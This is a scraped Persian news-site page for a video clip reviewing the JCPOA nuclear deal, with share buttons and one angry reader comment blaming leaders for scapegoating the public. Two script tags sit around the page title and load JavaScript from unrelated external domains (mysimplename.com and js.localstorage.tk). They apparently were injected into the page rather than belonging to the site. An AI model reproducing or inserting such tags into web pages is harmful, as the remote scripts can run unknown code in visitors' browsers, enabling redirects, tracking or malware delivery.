کلیپ تصویری "توهم سازش" - بررسی برجام


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>کلیپ تصویری "توهم سازش" - بررسی برجام<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
4

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)
  • ورود به این بازی از سال 1392 و نه در قالب مذاکره و برجام که در بطون دیگر و اساسی تر برای ایران یک خطر بزرگ بود. سردمداران خطر کردند و به بازی و جریان سازی های سیاست استکباری ورورد! باکی نیست... دیوار مردم کوتاهترین است... اگر شکست خوردند، مقصر مردم اند... همان مردمی که پا در جای پای پیشگامانشان گذاشته و می گذارند..
    همان مردم مطیع...که بغل هاشان به وقت نیاز مملکتی برای نگهداشت هندوانه های غیرت و شرف و شهیدپروری باز و مثالشان به وقت شکست سیاسی و اقتصادی و عقیدتی (از انتخاب ناشایست حکومتی گرفته تا عدم ظهور آقا) خوک صفتی است!
    دست مریزاد به این همه ...!!!!